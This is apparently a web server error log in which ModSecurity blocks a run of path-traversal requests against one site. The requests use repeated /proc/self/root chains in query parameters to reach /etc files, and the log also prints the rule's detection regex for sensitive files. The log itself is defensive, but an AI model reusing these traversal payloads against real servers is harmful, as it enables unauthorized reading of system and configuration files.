[Thu Mar 19 00:12:24.767454 2026] [:error] [pid 17653:tid 140411582465792] [client 74.7.241.31:55620] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abtpmMdf6f5d65gmYZQckwAAAtM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 00:12:26.938804 2026] [core:alert] [pid 14269:tid 140411599251200] [client 57.141.18.12:40542] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 00:12:38.716262 2026] [:error] [pid 31803:tid 140411607643904] [client 74.7.241.31:42956] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abtppuyqAr6etmhZHNoPfwAAAFA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 00:12:40.057872 2026] [proxy_fcgi:error] [pid 27403:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:39896] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 00:12:41.938614 2026] [:error] [pid 11816:tid 140411708356352] [client 74.7.241.31:46462] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abtpqew_le52K8_3pV0i6AAAAgQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 00:12:47.449961 2026] [:error] [pid 27293:tid 140411616036608] [client 74.7.241.31:46466] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abtpr_-YZRR_7pZ7nDI5pwAAA88"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 00:12:49.253010 2026] [:error] [pid 27403:tid 140411666392832] [client 74.7.241.31:53944] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abtpsRkFeYa1D6dYQnCUOgAAAck"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 00:12:53.226682 2026] [:error] [pid 11816:tid 140411599251200] [client 74.7.241.31:53956] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abtptew_le52K8_3pV0i6wAAAhE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 00:12:55.310512 2026] [core:alert] [pid 31803:tid 140411574073088] [client 57.141.18.27:41224] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 00:12:56.908303 2026] [:error] [pid 27293:tid 140411582465792] [client 74.7.241.31:53960] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abtpuP-YZRR_7pZ7nDI5rAAAA9M"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 00:13:01.131360 2026] [proxy_fcgi:error] [pid 23798:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:40282] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 00:13:04.878815 2026] [:error] [pid 26799:tid 140411582465792] [client 74.7.241.31:44660] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abtpwNa6ubjKNq_cu4bipwAAA1M"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 00:13:07.364422 2026] [:error] [pid 26799:tid 140411649607424] [client 74.7.241.31:44660] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abtpw9a6ubjKNq_cu4biqQAAA0s"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 00:13:10.750196 2026] [:error] [pid 14269:tid 140411582465792] [client 74.7.241.31:53656] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abtpxgbLMZ6AikZjR9UGyAAAABM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 00:13:24.069836 2026] [proxy_fcgi:error] [pid 23798:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:40688] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 00:13:35.369515 2026] [:error] [pid 27403:tid 140411708356352] [client 74.7.241.31:53668] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abtp3xkFeYa1D6dYQnCUagAAAcQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 00:13:36.734251 2026] [core:alert] [pid 15051:tid 140411574073088] [client 74.7.243.128:39368] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/usr/include/linux
[Thu Mar 19 00:13:39.744615 2026] [:error] [pid 9333:tid 140411574073088] [client 74.7.241.31:40432] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/geoip.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abtp4w_eYRmh974Uj6QLLQAAApQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 00:13:42.095492 2026] [:error] [pid 11816:tid 140411733534464] [client 74.7.241.31:40438] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abtp5uw_le52K8_3pV0i7gAAAgE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 00:13:45.129833 2026] [proxy_fcgi:error] [pid 14269:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:41086] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 00:13:46.913557 2026] [core:alert] [pid 9333:tid 140411540502272] [client 74.7.241.31:40442] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section, referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/lib
[Thu Mar 19 00:13:49.974050 2026] [:error] [pid 14269:tid 140411548894976] [client 74.7.241.31:38500] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abtp7QbLMZ6AikZjR9UGzwAAABc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 00:13:52.522675 2026] [:error] [pid 31803:tid 140411725141760] [client 74.7.241.31:38502] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abtp8OyqAr6etmhZHNoPkgAAAEI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 00:13:57.030381 2026] [:error] [pid 27293:tid 140411582465792] [client 74.7.241.31:38504] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abtp9f-YZRR_7pZ7nDI5wAAAA9M"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 00:13:59.338692 2026] [:error] [pid 31803:tid 140411658000128] [client 74.7.241.31:50364] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abtp9-yqAr6etmhZHNoPmwAAAEo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 00:14:04.432537 2026] [:error] [pid 15826:tid 140411674785536] [client 74.7.241.31:50380] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abtp_OoXxyEfFpUF8f-9EAAAAUg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 00:14:07.136753 2026] [proxy_fcgi:error] [pid 15051:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:41524] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 00:14:08.051303 2026] [mime_magic:error] [pid 9333:tid 140411658000128] (70014)End of file found: [client 74.7.243.128:53922] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php, referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/lib/debug/usr
[Thu Mar 19 00:14:09.562041 2026] [:error] [pid 27403:tid 140411699963648] [client 74.7.241.31:50390] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abtqARkFeYa1D6dYQnCUbwAAAcU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 00:14:12.166377 2026] [:error] [pid 15051:tid 140411590858496] [client 74.7.241.31:38502] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag 